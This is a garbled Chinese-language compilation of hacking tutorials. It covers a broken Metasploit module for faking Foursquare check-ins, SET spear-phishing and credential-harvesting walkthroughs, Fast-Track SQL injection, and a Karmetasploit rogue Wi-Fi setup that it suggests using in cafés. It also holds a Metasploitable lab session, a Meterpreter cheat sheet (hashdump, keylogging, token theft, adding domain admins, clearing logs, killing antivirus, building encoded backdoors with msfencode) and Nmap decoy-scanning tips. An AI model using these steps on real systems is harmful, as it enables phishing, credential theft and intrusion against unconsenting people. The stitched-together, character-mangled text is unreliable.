def&initialize
&Name&&=&&&Foursquare&Location&Poster&,
&Version&&=&&&$Revision:$&,
&Description&&=&&&F*ck&with&Foursquare,be&anywhere&you&want&to&be&by&venue
&Author&&=&&[&CG&],
&License&&=&&MSF_LICENSE,
&References&&=&
[&URL&,&/group/foursquare-api&],
[&URL&,&/im-a-foursquare-cheater/&],
#todo&pass&in&geocoords&instead&of&venueid,create&a&venueid,&other&tom&foolery
register_options(
Opt::RHOST(&&),
OptString.new(&VENUEID&,[true,&foursquare&venueid&,&185675&]),
OptString.new(&USERNAME&,[true,&foursquare&username&,&username&]),
OptString.new(&PASSWORD&,[true,&foursquare&password&,&password&]),
],self.class)
user&=&datastore[&USERNAME&]
pass&=&datasore[&PASSWORD&]
venid&=&datastore[&VENUEID&]
user_pass&=&Rex::Text.encode_base64(user&+&&:&&+&pass)
decode&=&Rex::Text.decode_base64(user_pass)
postrequest&=&&twitter=1\n&&#add&facebook=1&if&you&want&facebook
print_status(&Base64&Encode&User/Pass:&#{user_pass}&)&#debug
print_status(&Base64&Decode&User/Pass:&#{decode}&)&#debug
res&=&send_request_cgi({
&uri&&=&&&/v1/checkin?vid=#{venid}&,
&version&&=&&&1.1&,
&method&&=&&&POST&,
&data&&=&&postrequest,
&headers&&=&
&Authorization&&=&&&Basic&#{user_pass}&,
&Proxy-Connection&=&&&Keep-Alive&,
print_status(&#{res}&)
rescue&::Rex::ConnectionRefused,&::Rex::HostUnreachable,&::Rex::ConnectionTimeout
rescue&::Timeout::Error,&::Errno::EPIPE&=&e
pus&e.message
ruby&白痴一个,代码我也没看懂,不解释了
如何使用:
msf&&search&foursquare
msf&&use&admin/foursquare
set&VENUEID&2584421
set&USERNAME&
set&PASSWORD&ilovemetasploit
十.社会工程学工具集(SET)
主要功能:hacking&the&human&mind。
1、SET&基本配置:
SET&位于/pentest/exploits/set/目录
cd&/pentest/exploits/set/
svn&update
配置文件config/set_config,当使用基于web&的攻击方式时可以将email&功能打开:
vi&config/set_config:
METASPLOIT_PATH=/opt/framework3/msf3
WEBATTACK_EMAIL=ON
使用Java&applet&attack&进行攻击的时候默认使用Microsoft&作为发布者名称,如果需要自
定义则需要安装JDK&并打开配置项:
SELF_SIGNED_APPLET=ON
SET&默认打开AUTO_DETECT&项,自动探测本机IP&并用于攻击中的各项配置。如果本
机是多网卡需要手动指定IP,则需将此项关闭:
AUTO_DETECT=OFF
SET&默认使用内建的python&提供的web&server&供使用,如需使用apache&作为服务则需
要本机安装apache&并打开配置项:
APACHE_SERVER=ON
2、网络钓鱼攻击(Spear-Phishing&Attack&Vector):
利用文件格式漏洞(如PDF)等生成后门并通过email(GMAIL,SENDMAIL,)向目标
发送带后门附件的电子邮件,诱使目标打开附件激活后门。
此时选择菜单1.Spear-Phishing&Attack&Vectors
继续选择:1.Perform&a&Mass&Email&Attack
选择exploit:8.Adobe&Collab.collectEmailInfo&Buffer&Overflow
选择payload:4.Windows&Reverse&TCP&Shell
选择是否更改文件名:1.Keep&the&filename
选择发送邮件方式1.Email&Attack&Single&Email&Address
选择邮件模板1.Pre-Defined&Template
5.Status&Report
输入收件方email&地址:
选择发件方式:1.Use&a&GMAIL&Account&for&your&email&attack
输入发件gmail&和密码
选择是否立即监听端口等待连接:yes
此时SET&会使用刚才的设定全自动监听指定端口。
3、WEB&方式攻击:
SET&可以克隆一个网站并植入后门以此迷惑目标打开此网站并中招。
Java&Applet&方式:最成功的方式之一,并不是利用java&的漏洞,而是当目标浏览
含后门的仿冒站点时会被询问是否允许执行web&中的java&applet,一旦点击允许则
payload&开始运行,目标将被重定向到真实的网站。
用户端(Client-side)web&exploit&方式:利用用户端存在的软件漏洞,一般使用0day
进行攻击的效果最好。
账号密码获取(Username&and&Password&Harvesting):通过克隆一个目标站并诱使攻
击目标登陆,截获其账号密码。例如截获GMAIL&密码。
标签页绑架(Tabnabbing):当目标打开多个标签页浏览网站并切换标签页时,网
站侦测到目标的行为并显示让目标等待的信息,恰好目标打开了被绑架的标签页并要求
在相似程度惊人的网站里输入登陆凭据,当目标输入之后登陆信息即被截获,同时被重
定向到真实网站。
中间人攻击(Man-Left-in-the-Middle):此方式使用已经被攻陷的网站的HTTP&请
求或者网站的XSS&漏洞让用户的登陆信息发送至攻击者的HTTP&服务器。如果你发现
了一个网站的XSS&漏洞,可以利用此漏洞构造一个url&发送给目标诱使其打开并登陆以
截获登陆信息。
Web&Jacking:当目标打开我们的网站时会有一个链接显示为正确的web&地址,此
时若目标打开此仿冒链接会被定向到我们的仿冒网站,其登陆信息会被截获。
混合模式(multi-attack):可同时使用以上多种攻击手段以提高成功率。
介质感染攻击(Infectious&Media&Generator):可以让你生成一张光盘或者u&盘,里面包
含autorun.inf&来运行指定的后门文件或者file-format&漏洞文件。
迷你USB&人机接口设备(Teensy&USB&HID):当电脑插入USB&设备且autorun.inf&被禁
用时,可使用此方法将USB&设备模拟成一个键盘或鼠标设备,进而截获目标机器的击
SET&其他特殊功能:
包括SET&交互式shell,可用来替代meterpreter;远程管理工具(RATTE);HTTP&隧道,
当目标主机只开放HTTP&端口对外放行时可通过此功能与主机进行通信;WEB-GUI,
包含了常用攻击和无线攻击向导,输入./set-web&即可运行。
(SET&新版本变动较大,请自行摸索。)
十一.FAST-TRACK
Fast-Track&和SET&一样都是python&编写的,同样是使用MSF&提供的payload&以及用户
端攻击向导等,作为对MSF&的补充,它提供了如MSSQL&攻击,更多的exploit,浏览
器攻击向导等。fasttrack&位于/pentest/exploits/fasttrack/。
交互式模式:./fast-track.py&-i
命令行模式:./fast-track.py&-c
Web&界面模式:./fast-track.py&-g
1、MSSQL&工具:
MSSQL&注入漏洞攻击:
攻击时你只需要输入有注入漏洞的url&地址,地址里面用INJECTHERE&标识可注入字
段,如/show.asp?id=INJECTHERE&date=2012,fast-track&会全自动注
入,一旦成功会给你返回一个cmd&shell。
注入也支持POST&参数,如果是POST&的话更加简单,只需要你输入url&地址,fast-track
会自动判断并尝试进行注入。
SQL&暴力破解:另外一个实用的功能是暴力破解器(MSSQL&Bruter),可以寻找mssql
弱口令,一旦获取到一个sa&权限的访问权限,将自动返回一个shell。
SQL&注入批量扫描器(SQLPwnage):此功能可扫描指定网段的所有打开80&端口的主
机,并扫描是否存在sql&注入点,一旦发现注入点将自动尝试攻击并通过xp_cmdshell
获取系统权限。
2、Binary-HEX&转换器:
当你已经进入一个系统且需要上传可执行文件上去,就可以使用这个工具将可执行的二
进制文件转换为HEX&十六进制编码,然后复制粘贴过去即可。
3、批量用户端攻击:
和浏览器攻击差不多,但是增加了对目标的ARP&缓冲区和DNS&感染(只能是在测试者
和目标处于同一网段的情况下),以及MSF&里面没有的浏览器溢出exploit。当目标浏览
恶意网站的时候,fast-track&尝试着使用所有的exp&对目标机器进行溢出,一旦某个exp
起作用将获取到目标机器的控制权限。
(新版本fasttrack&中还加入了Autopwn&Automation、Nmap&Scripting&Engine、Exploits、
Payload&Generator&等新功能。)
脚本化的工具有时确实能减少很多工作时间,但是不能完全依赖于这类自动程度很高的
工具,特别是在用这些工具搞不定目标的时候,手工测试的能力往往才是王道,细节决定成
十二.KARMERASPLOIT
Karmetasploit&=&Karma&+&Metasploit,也可以说成它是MSF&的KARMA&实现。
Karma&和MSF&一样也是使用ruby&语言编写的,其功能是建立一个虚假的无线接入点,
等待目标连接上钩。与MSF&结合可实现更强大的功能。Karmetasploit&集成了DNS,POP3,
IMAP4,SMTP,FTP,SMB,HTTP&等服务用于攻击,模块位于modules/auxiliary/server&目录下。
基本配置:
需要的配置不多,首先需要配置一个DHCP&服务为目标提供动态IP&分配,配置文件:
------------------------------------------------------------------------
option&domain-name-servers&10.0.0.1;
default-lease-time&60;
max-lease-time&72;
ddns-update-style&
log-facility&local7;
subnet&10.0.0.0&netmask&255.255.255.0&{
range&10.0.0.100&10.0.0.254;
option&routers&10.0.0.1;
option&domain-name-servers&10.0.0.1;
-----------------------------------------------------------------------------
将配置文件保存在/etc/dhcp3/dhcpd.conf
下一步下载karma&msf&脚本:
wget&http://www./downloads/karma.rc
将网卡激活为监听模式:
airmon-ng&start&wlan0
创建伪装接入点,-P&可被扫描到,-C&信号发射速率,-e&接入点名称(需要具有欺骗性),
-v&指定网卡,mon0&为上一步完成后生成的:
airbase-ng&-P&-C&30&-e&"China-Net-Free"&-v&mon0
此时会生成一个名为at0&的新网卡接口。
接着打开DHCP&服务:
ifconfig&at0&up&10.0.0.1&netmask&255.255.255.0
dhcpd3&-cf&/etc/dhcp3/dhcpd.conf&at0
检查是否成功启动:
ps&aux|grep&dhcpd
tail&-f&/var/log/messages
下一步加载karma&脚本:
msf&&resource&karma.rc
等待收获:
当对方打开邮件客户端并登陆收取邮件,那么他的账户密码将被截获,因为他所连接的
DNS&和POP3&都是虚假的。
当对方打开浏览器准备浏览网页时karma&开始截取cookie,建立虚假email,DNS&等服
务,加载exploits&来对付客户端浏览器,如果走运的话可以获取到shell。
总结:建议这招可以拿到麦当劳,星巴克用,效果更好。
十三.构建自己的模块,编写自己的exploit,meterpreter
*************************************************************
这三章留着后面看,需要有ruby&基础等编程基础。
****************************************************
十四.渗透实战演习
首先需要下载并安装一个专门用来练习渗透的虚拟机Metasploitable:
/data/Metasploitable.zip.torrent
虚拟机IP:172.16.32.162&用户名密码:msfadmin
WINXP:172.16.32.131&开放80&端口有防火墙
情报收集:
nmap&-sT&-P0&172.16.32.131
msfconsole:
cd&/opt/framework3/msf3/
msfconsole
msf&&use&multi/handler
set&payload&windows/meterpreter/reverse_tcp
set&lhost&172.15.32.129
set&lport&443
load&auto_add_route
exploit&-j
run&getgui&-e&-f&8080
net&user&msf&msf&/add
net&localgroup&administrators&msf&/add
upload&nmap.exe
nmap.exe&-sT&-A&-P0&172.16.32.162
msf&&use&auxiliary/scanner/ftp/ftp_version
set&RHOSTS&172.16.32.162
msf&&use&auxiliary/scanner/smtp/smtp_version
set&RHOSTS&172.16.32.162
search&tomcat_mgr_login
set&rhosts&172.16.32.162
set&threads&50
set&rport&8180
set&verbose&false
use&multi/http/tomcat_mgr_deploy
set&password&tomcat
set&username&tomcat
set&rhost&172.16.32.162
set&lport&9999
set&rport&8180
set&payload&linux/x86/shell_bind_tcp
search&distcc_exec
set&payload&linux/x86/shell_reverse_tcp
set&lhost&172.16.32.129
set&rhost&172.16.32.162
show&payloads
set&payload&cmd/unix/reverse
十五.常用命令备忘
-------------------------------------
MSFconsole&Commands
-------------------------------------
show&exploits&查看所有exploit
show&payloads&查看所有payload
show&auxiliary&查看所有auxiliary
search&name&搜索exploit&等
info&查看加载模块的信息
use&name&加载模块
LHOST&本机IP
RHOST&目标IP
set&function&设置选项值
setg&function&全局设置
show&options&查看选项
show&targets&查看exp&可选的平台
set&target&num&设置exp&作用平台
set&payload&payload&设置payload
show&advanced&查看高级选项
set&autorunscript&migrate&-f&设置自动执行指令
check&测试是否可利用
exploit&执行exp&或模块
exploit&-j&作为后台执行
exploit&-z&成功后不立即打开session
exploit&-e&encoder&指定encoder
exploit&-h&查看帮助信息
sessions&-l&-v&列出可用sessions&详细信息
sessions&-s&script&在指定session&执行脚本
sessions&-K&结束session
sessions&-c&cmd&执行指定命令
sessions&-u&sessionID&升级shell
db_create&name&创建数据库
db_connect&name&连接数据库
db_nmap&nmap&扫描并导入结果
db_autopwn&-h&查看autopwn&帮助
db_autopwn&-p&-r&-e&基于端口,反弹shell
db_destroy&删除数据库
-----------------------------------------------------------------
Meterpreter&Commands
---------------------------------
help&查看帮助
run&scriptname&运行脚本
sysinfo&系统基本信息
use&priv&运行提权组件
migrate&PID&PID&迁移
use&incognito&token&窃取
list_tokens&-u&查看可用用户token
list_tokens&-g&查看可用组token
impersonate_token&DOMAIN_NAME\\USERNAME&模仿token
steal_token&PID&窃取PID&所属token&并模仿
drop_token&停止模仿token
getsystem&获取SYSTEM&权限
shell&运行shell
execute&-f&cmd.exe&-i&交互式运行cmd
execute&-f&cmd.exe&-i&-t&使用可用token&运行
execute&-f&cmd.exe&-i&-H&-t&同上,同时隐藏进程
rev2self&返回至初始用户
reg&command&修改注册表
setkesktop&number&切换至另一已登录用户屏幕
screenshot&截屏
upload&file&上传文件
download&file&下载文件
keyscan_start&开始截取击键记录
keyscan_stop&停止截取击键记录
getprivs&尽可能提升权限
uictl&enable&keyboard/mouse&获取键盘或鼠标的控制权
background&将当前meterpreter&shell&转入后台
hashdump&导出所有用户hash
use&sniffer&加载嗅探模块
sniffer_interfaces&查看可用网卡接口
sniffer_dump&interfaceID&pcapname&开始嗅探
sniffer_start&interfaceID&packet-buffer&指定buffer&范围嗅探
sniffer_stats&interfaceID&抓取统计信息
sniffer_stop&interfaceID&停止嗅探
add_user&username&password&-h&ip&添加用户
add_group_user&"Domain&Admins"&username&-h&ip&添加用户至管理组
clearev&清空日志
timestomp&改变文件属性如创建时间等
reboot&重启
---------------------------------------------------------------
MSFpayload&Commands
--------------------------------
msfpayload&-h&查看帮助
msfpayload&windows/meterpreter/bind_tcp&0
查看指定payload&可用选项
msfpayload&windows/meterpreter/reverse_tcp&LHOST=192.168.1.2&LPORT=443&X&&
payload.exe
生成payload.exe
msfpayload&windows/meterpreter/reverse_tcp&LHOST=192.168.1.2&LPORT=443&R&&
payload.raw
保存为RAW&格式,可用于msfencode
msfpayload&windows/meterpreter/bind_tcp&LPORT=443&C&&&payload.c
保存为C&格式
msfpayload&windows/meterpreter/bind_tcp&LPORT=443&J&&&payload.java
保存为java&格式
-------------------------------
MSFencode&Commands
-------------------------------
msfencode&-h&查看帮助
msfencode&-l&查看可用encoder
msfencode&-t&(c,elf.exe,java.js_le,js_be,perl,raw,ruby,vba,vbs,loop-vbs,asp,war,macho)
以指定格式显示编码后的buffer
msfencode&-i&payload.raw&-o&encoded_payload.exe&-e&x86/shikata_ga_nai&-c&5&-t&exe
生成编码后的exe
msfpayload&windows/meterpreter/bind_tcp&LPORT=443&R&|&msfencode&-e&x86/countdown&-c
5&-t&raw&|&msfencode&-e&x86/shikata_ga_nai&-c&5&-t&exe&-o&multi-encoded.exe
多编码器结合,多次编码
msfencode&-i&payload.raw&BufferRegister=ESI&-e&x86/alpha_mixed&-t&c
生成纯字符格式C&类型shellcode
---------------------------
MSFcli&Commands
---------------------------
msfcli&|grep&exploit&只显示exploit
msfcli&|&grep&exploit/windows&只显示windows&exploit
msfcli&exploit/windows/smb/ms08_067_netapi&PAYLOAD=windows/meterpreter/bind_tcp
LPORT=443&RHOST=172.16.32.26&E
针对指定IP&加载指定exp&并设定payload
-----------------------------------------------
MSF,Ninja,Fu
------------------------
msfpayload&windows/meterpreter/reverse_tcp&LHOST=192.168.1.2&LPORT=443&R&|
msfencode&-x&calc.exe&-k&-o&payload.exe&-e&x86/shikata_ga_nai&-c&7&-t&exe
使用calc.exe&作为模板,生成经过编码的后门
msfpayload&windows/meterpreter/reverse_tcp&LHOST=192.168.1.2&LPORT=443&R&|
msfencode&-x&calc,exe&-o&payload.exe&-e&x86/shikata_ga_nai&-c&7&-t&exe
与上面差不多,只是执行的时候不依赖于生成的可执行文件,且不会有任何提示信息
msfpayload&windows/meterpreter/bind_tcp&LPORT=443&R&|&msfencode&-o&payload.exe
-e&x86/shikata_ga_nai&-c&7&-t&exe&&&&msfcli&multi/hanler
PAYLOAD=windows/meterpreter/bind_tcp&LPORT=443&E
生成编码后的payload&并开始监听本机端口
-----------------------
-----------------------
msfvenom&--payload&自动生成payload
-----------------------------------------------------
Meterpreter&Post&Exploitation&Commands
-----------------------------------------------------
提权一般步骤
meterpreter&&use&priv
meterpreter&&getsystem
meterpreter&&ps
meterpreter&&steal_token&1784
meterpreter&&shell
net&user&msf&msf&/add&/DOMAIN
net&group&"Domain&Admins"&msf&/add&/DOMAIN
获取hash&一般步骤
meterpreter&&use&priv
meterpreter&&getsystem
meterpreter&&hashdump
如果是在win2008&系统上:
meterpreter&&run&migrate
meterpreter&&run&killav
meterpreter&&ps
meterpreter&&migrate&1436
meterpreter&&keyscan_start
meterpreter&&keyscan_dump
meterpreter&&keyscan_stop
使用Incognito&提权
meterpreter&&use&incognito
meterpreter&&list_tokens&-u
meterpreter&&use&priv
meterpreter&&getsystem
meterpreter&&list_tokens&-u
meterpreter&&impersonate_token&IHAZSECURITY\\Administrator
查看保护机制并禁用之
meterpreter&&run&getcountermeasure
meterpreter&&run&getcountermeasure&-h
meterpreter&&run&getcountermeasure&-d&-k
检查是否是虚拟机
meterpreter&&run&checkvm
转入命令行
meterpreter&&shell
远程VNC&控制
meterpreter&&run&vnc
meterpreter&&background
Bypass&UAC
meterpreter&&run&post/windows/escalate/bypassuac
OS&X&系统上dump&hash
meterpreter&&run&post/osx/gather/hashdump
Linux&系统上dump&hash
meterpreter&&run&post/linux/gather/hashdump
转自:&[url=http://www.t00ls.net/&&完&&&&&
http://www.t00ls.net/
Nmap在实战中的高级用法
Nmap提供了四项基本功能(主机发现、端口扫描、服务与版本侦测、OS侦测)及丰富的脚本库。Nmap既能应用于简单的网络信息扫描,也能用在高级、复杂、特定的环境中:例如扫描互联网上大量的主机;绕开防火墙/IDS/IPS;扫描Web站点;扫描路由器等等。简要回顾Nmap简单的扫描方式:
view source1 全面扫描:nmap-T4&-A targetip
2&主机发现:nmap-T4&-sn targetip &&&
3&端口扫描:nmap-T4 targetip &&&
4&服务扫描:nmap-T4&-sV targetip &&&
5&操作系统扫描:nmap-T4&-O targetip
上述的扫描方式能满足一般的信息搜集需求。而若想利用Nmap探索出特定的场景中更详细的信息,则需仔细地设计Nmap命令行参数,以便精确地控制Nmap的扫描行为。
下面列举比较实用的高级应用场景和技巧。1 &&& Nmap高级选项1.1 &查看本地路由与接口Nmap中提供了&iflist选项来查看本地主机的接口信息与路由信息。当遇到无法达到目标主机或想选择从多块网卡中某一特定网卡访问目标主机时,可以查看nmap &iflist中提供的网络接口信息。
nmap&&iflist1.2 &指定网口与IP地址在Nmap可指定用哪个网口发送数据,-e &interface&选项。接口的详细信息可以参考&iflist选项输出结果。示例:
nmap&-e eth0 targetipNmap也可以显式地指定发送的源端IP地址。使用-S &spoofip&选项,nmap将用指定的spoofip作为源端IP来发送探测包。另外可以使用Decoy(诱骗)方式来掩盖真实的扫描地址,例如-D ip1,ip2,ip3,ip4,ME,这样就会产生多个虚假的ip同时对目标机进行探测,其中ME代表本机的真实地址,这样对方的防火墙不容易识别出是扫描者的身份。
nmap -T4&-F&-n&-Pn&-D192.168.1.100,192.168.1.101,192.168.1.102,ME 192.168.1.11.3 &定制探测包Nmap提供&scanflags选项,用户可以对需要发送的TCP探测包的标志位进行完全的控制。可以使用数字或符号指定TCP标志位:URG, ACK, PSH,RST, SYN,and FIN。例如,
nmap -sX&-T4&&scanflags URGACKPSHRSTSYNFINtargetip此命令设置全部的TCP标志位为1,可以用于某些特殊场景的探测。另外使用&ip-options可以定制IP包的options字段。使用-S指定虚假的IP地址,-D指定一组诱骗IP地址(ME代表真实地址)。-e指定发送探测包的网络接口,-g(&source- port)指定源端口,-f指定使用IP分片方式发送探测包,&spoof-mac指定使用欺骗的MAC地址。&ttl指定生存时间。2 &&&&扫描防火墙防火墙在今天网络安全中扮演着重要的角色,如果能对防火墙系统进行详细的探测,那么绕开防火墙或渗透防火墙就更加容易。所以,此处讲解利用Nmap获取防火墙基本信息典型的用法。为了获取防火墙全面的信息,需尽可能多地结合不同扫描方式来探测其状态。在设计命令行参数时,可以综合网络环境来微调时序参数,以便加快扫描速度。SYN扫描首先可以利用基本的SYN扫描方式探测其端口开放状态。
nmap -sS&-T4&扫描输出为:
view source1 All 997 ports are filtered &&&
2 PORT && STATE& SERVICE &&&
3 80/tcp& open & http &&&
4 113/tcp closed auth &&&
5 507/tcp open & crs 我们可以看到SYN方式探测到3个端口开放,而有997个端口被过滤。Nmap默认扫描只扫描1000个最可能开放的端口,如果想扫描全部的端口.
使用命令nmap -sS&-T4-p-&FIN扫描然后可以利用FIN扫描方式探测防火墙状态。FIN扫描方式用于识别端口是否关闭,收到RST回复说明该端口关闭,否则说明是open或filtered状态。
nmap -sF&-T4&
view source01 PORT &&&& STATE &&&&&&& SERVICE &&&
02 7/tcp &&& open|filtered echo &&&
03 9/tcp &&& open|filtered discard &&&
04 11/tcp && open|filtered systat &&&
05 13/tcp && open|filtered daytime &&&
06 23/tcp && open|filtered telnet &&&
07 25/tcp && open|filtered smtp &&&
08 37/tcp && open|filtered time &&&
09 79/tcp && open|filtered finger &&&
10 80/tcp && open|filtered http &&&
11&更多端口,此处省略&ACK扫描然后利用ACK扫描判断端口是否被过滤。针对ACK探测包,未被过滤的端口(无论打开、关闭)会回复RST包。
nmap -sA&-T4&扫描输出为:
view source1 Not shown: 997 unfiltered ports &&&
2 PORT &&&& STATE && SERVICE &&&
3 135/tcp & filtered msrpc &&&
4 1434/tcp& filtered ms-sql-m &&&
5 32777/tcp filtered sometimes-rpc17 从 结果可以997个端口是未被过滤的(unfiltered),而3个(135/)被过滤了。所以,将ACK与FIN扫描&的结果结合 分析,我们可以找到很多开放的端口。例如7号端口,FIN中得出的状态是:open或filtered,从ACK中得出的状态是 unfiltered,那么该端口只能是open的。
Window扫描当然也可以利用Window扫描方式,得出一些端口信息,可以与之前扫描分析的结果相互补充。Window扫描方式只对某些TCPIP协议栈才有效。window扫描原理与ACK类似,发送ACK包探测目标端口,对回复的RST包中的Window size进行解析。在某些TCPIP协议栈实现中,关闭的端口在RST中会将Window size设置为0;而开放的端口将Window size设置成非0的值。
nmap -sW&-p-&-T4&输出结果:
view source1 PORT &&&& STATE && SERVICE &&&
2 7/tcp &&& open &&& echo &&&
3 9/tcp &&& open &&& discard &&&
4 11/tcp && open &&& systat &&&
5 13/tcp && open &&& daytime &&&
6&更多端口,此处省略&在采用多种方式获取出防火墙状态后,可以进一步进行应用程序与版本侦测及OS侦测。
此处不再赘述!91ri.org:小编这里份关于使用nmap突破防火墙的文章&推荐一下《Nmap绕过防火墙&脚本的使用》3 &&&&扫描路由器Nmap内部维护了一份系统与设备的数据库(nmap-os-db),能够识别数千种不同系统与设备。所以,可以用来扫描主流的路由器设备。3.1 &扫描思科路由器
nmap -p1-25,80,512-515,01,.0.1/16思科路由器会在上述端口中运行了常见的服务。列举出上述端口开放的主机,可以定位到路由器设备可能的IP地址及端口状态。3.2 &扫描路由器TFTP
nmap &sU&&p69&&nvv target大多数的路由器都支持TFTP协议(简单文件传输协议),该协议常用于备份和恢复路由器的配置文件,运行在UDP 69端口上。使用上述命令可以探测出路由器是否开放TFTP。3.3 &扫描路由器操作系统与通用PC扫描方式类似,使用-O选项扫描路由器的操作系统。-F用于快速扫描最可能开放的100个端口,并根据端口扫描结果进一步做OS的指纹分析。
nmap -O&-F&-n 192.168.1.1
4 &&&&扫描互联网Nmap内部的设计非常强大灵活,既能扫描单个主机、小型的局域网,也可以扫描成千上万台主机从中发掘用户关注的信息。扫描大量主机,需要对扫描时序等参数进行仔细的优化。4.1 &发现互联网上web服务器
nmap -iR 100000 -sS&-PS80&-p 80 -oG nmap.txt随机地产生10万个IP地址,对其80端口进行扫描。将扫描结果以greppable(可用grep命令提取)格式输出到nmap.txt文件。可以使用grep命令从输出文件提取关心的细节信息。4.2 &统计互联网主机基本数据  Nmap的创始人Fyodor在2008年的Black Hat大会发表一篇演讲,讲的是如何使用Nmap来扫描互联网(Nmap: Scanning the Internet),资料地址:。  Fyodor进行互联网扫描的初衷是统计出网络经验数据并用之优化Nmap的性能。例如,根据统计出每个端口开放的概率,优先扫描常见端口,以节省用户的时间。产生随机IP地址  产生100万个随机的IP地址,并将之保存到文件中,方便后续扫描时作为参数输入。
nmap -iR 1200000 -sL&-n&| grep &not scanned&&| awk &{print&$2}&&| sort -n&| uniq &! head - tp &! tcp-allports-1M-IPs; rm tp上 述命令含义:随机生成1200000个IP地址(-iR 120000),并进行列表扫描(-sL,列举出IP地址,不进行真正的扫描),不进行dns解析操作(-n),这样将产生Nmap列表扫描的结果。在 此&结果中搜出未扫描的行(grep &not scanned&),打印出每一行的第二列内容(awk &{print&$2}&,也就是IP地址),然后对获取到的IP地址进行排序(sort&-n),然后剔除重复IP地址,将结果保存到临时文件tp,再 取出前1000000个IP地址保存到tcp-allports-1M-IPs文件中,删除&临时文件。总之,此处产生了1000000个随机IP地址存放在tcp-allports-1M-IPs文件中。优化主机发现
nmap&-sP&-PE&-PP&-PS21,22,23,25,80,113,31339-PA80,113,443,10042&&source-port 53 -T4&-iL tcp-allports-1M-IPs上 述命令进行主机发现:使用产生的IP地址(-iL tcp-allports-1M-IPs),指定发送包的源端口为53(&source-port 53,该端口是DNS查询端口,一般的防火墙都允许来自此端口的数据包),时序级别为4(-T4,探测速度比较快),以TCP SYN包方式探测目标机的21,22,23,25,80,113,31339端口,以TCP ACK包方式探测对方80,113,443,10042端口,另外也发送ICMP ECHO/ICMP TIMESTAMP包探测对方主机。只要上述的探测包中得到一个回复,就可以证明目标主机在线。完整的扫描命令在准备了必要的IP地址文件,并对主机发现参数优化后,我们就得到最终的扫描命令:
nmap -S&[srcip]&-d&&max-scan-delay 10 -oAlogs/tcp-allports-%T-%D&-iL tcp-allports-1M-IPs &max-retries 1&randomize-hosts -p-&-PS21,22,23,25,53,80,443&-T4&&min-hostgroup 256 &min-rate175&&max-rate 300上述命令用于扫描互联网上100万台主机全部的TCP端口的开放情况。使 用包含100万个IP地址的文件(-iL tcp-allports-1M-IPs),源端IP地址设置为srcip(指定一个IP地址,保证该IP地址位于统一局域网中,否则无法收到目标机的 回&复包),主机发现过程使用TCP SYN包探测目标机的21,22,23,25,53,80,443,扫描过程将随机打乱主机顺序(&randomize-hosts,因为文件中的IP 已经排序,这里将之打乱,避免被防火墙检查出),端口扫描过程检查全部的TCP端口(-p-,端口1到65535),使用时序级别为4(-T4,速度比 较&快),将结果以XML/grepable/普通格式输出到文件中(-oA logs/tcp-allports-%T-%D,其中%T表示扫描时间,%D表示扫描日期)。-d表示打印调试出信息。&max-scan-delay 10表示发包最多延时10秒,防止特殊情景下等待过长的时间。&max-retries 1,表示端口扫描探测包最多被重传一次,防止Nmap在没有收到回复的情况下多次重传探测包,当然这样也会降低探测的准确性。&min-host-group 256表示进行端口扫描与版本侦测时,同时进行探测的主机的数量,这里至少256个主机一组来进行扫描,可以加快扫描速度。&min-rate 175和&max-rate 300,表示发包速率介于175和300之间,保证扫描速度不会太慢,也不会因为速率过高引起目标机的警觉。扫描结果Fyodor组织的此次扫描得出很多重要结论,统计出了互联网最有可能开放的10个TCP端口。80 (http)23 (telnet)22 (ssh)443 (https)3389 (ms-term-serv)445 (microsoft-ds)139 (netbios-ssn)21 (ftp)135 (msrpc)25 (smtp)最有可能开放的10个UDP端口。137 (netbios-ns)161 (snmp)1434 (ms-sql-m)123 (ntp)138 (netbios-dgm)445 (microsoft-ds)135 (msrpc)67 (dhcps)139 (netbios-ssn)53 (domain)5 &&&&扫描Web站点Web 是互联网上最广泛的应用,而且越来越多的服务倾向于以Web形式提供出来,所以对Web安全监管也越来越重要。目前安全领域有很多专门的 Web扫描软件(如AppScan、WebInspect、W3AF),能够提供端口扫描、漏洞扫描、漏洞利用、分析报表等诸多功能。而Nmap作为一 款&开源的端口扫描器,对Web扫描方面支持也越来越强大,可以完成Web基本的信息探测:服务器版本、支持的Method、是否包含典型漏洞。功能已经 远远&超过同领域的其他开源软件,如HTTPrint、Httsquash。目前Nmap中对Web的支持主要通过Lua脚本来实现,NSE脚本库中共有50多个HTTP相关的脚本。扫描实例:
nmap -sV&-p 80 -T4&&script http*,defaultscanme.nmap.org&  上面以扫描scanme.nmap.org的Web应用展示Nmap提供Web扫描能力,从图中可以看到扫描结果中提供了比较丰富的信息。首先是应用程序及版本:Apachehttpd 2.2.14 (Ubuntu)然后搜出了该站点的affiliate-id:该ID可用于识别同一拥有者的不同页面。然后输出HTTP-headers信息,从中查看到基本配置信息。从http-title中,可以看到网页标题。某些网页标题可能会泄漏重要信息,所以这里也应对其检查。有想深入学习nmap的也可以参考:《渗透测试工具Nmap从初级到高级》文章from:http://blog.csdn.net/aspirationflow/article/details/7983368本文来自:&网络安全攻防研究室()&请尊重作者,转载时带上版权信息。&详细内容请参考:&
运行 Metasploit Framework
依照Kali Linux网络服务策略,Kali没有自动启动的网络服务,包括数据库服务在内.所以为了让Metasploit以支持数据库的方式运行有些必要的步骤.启动Kali的PostgreSQL服务Metasploit 使用PostgreSQL作为数据库,所以必须先运行它.
service postgresql start
你可以用ss -ant的输出来检验PostgreSQL是否在运行,然后确认5432端口处于listening状态.
State Recv-Q Send-Q Local Address:Port Peer Address:Port
LISTEN 0 128 :::22 :::*
LISTEN 0 128 *:22 *:*
LISTEN 0 128 127.0.0.1:5432 *:*
LISTEN 0 128 ::1:5432 :::*
启动Kali的Metasploit服务随着PostgreSQL的启动和运行,接着我们要运行Metasploit服务.第一次运行服务会创建一个msf3数据库用户和一个叫msf3的数据库.还会运行Metasploit RPC和它需要的WEB 服务端.
service metasploit start
在Kali运行msfconsole现在PostgreSQL 和 Metasploit服务都运行了,可以运行 msfconsole ,然后用 db_status 命令检验数据库的连通性.
msfconsole
msf & db_status
[*] postgresql connected to msf3
配置Metasploit随系统启动运行如果你想PostgreSQL和Metasploit在开机时运行,你可以使用update-rc.d启用服务.
update-rc.d postgresql enable
update-rc.d metasploit enable
Virtual Box的Kali Linux虚拟机
如果你想在VirtualBOX里安装Kali Linux,为了能够顺利安装功能增强工具,请参考如下的指南.建议使用最新版的VirtualBOX,因为可以提升用户体验,包括兼容性的提高,软件核心和客户端功能增强工具的稳定性的增强.在Virtual Box的Kali Linux虚拟机安装增强工具为了整合鼠标和屏幕以及与你的宿主机共享目录,你应该安装VirtualBox增强功能工具.启动Kali Linux虚拟机后,打开一个终端然执行如下命令来安装Linux内核头文件.
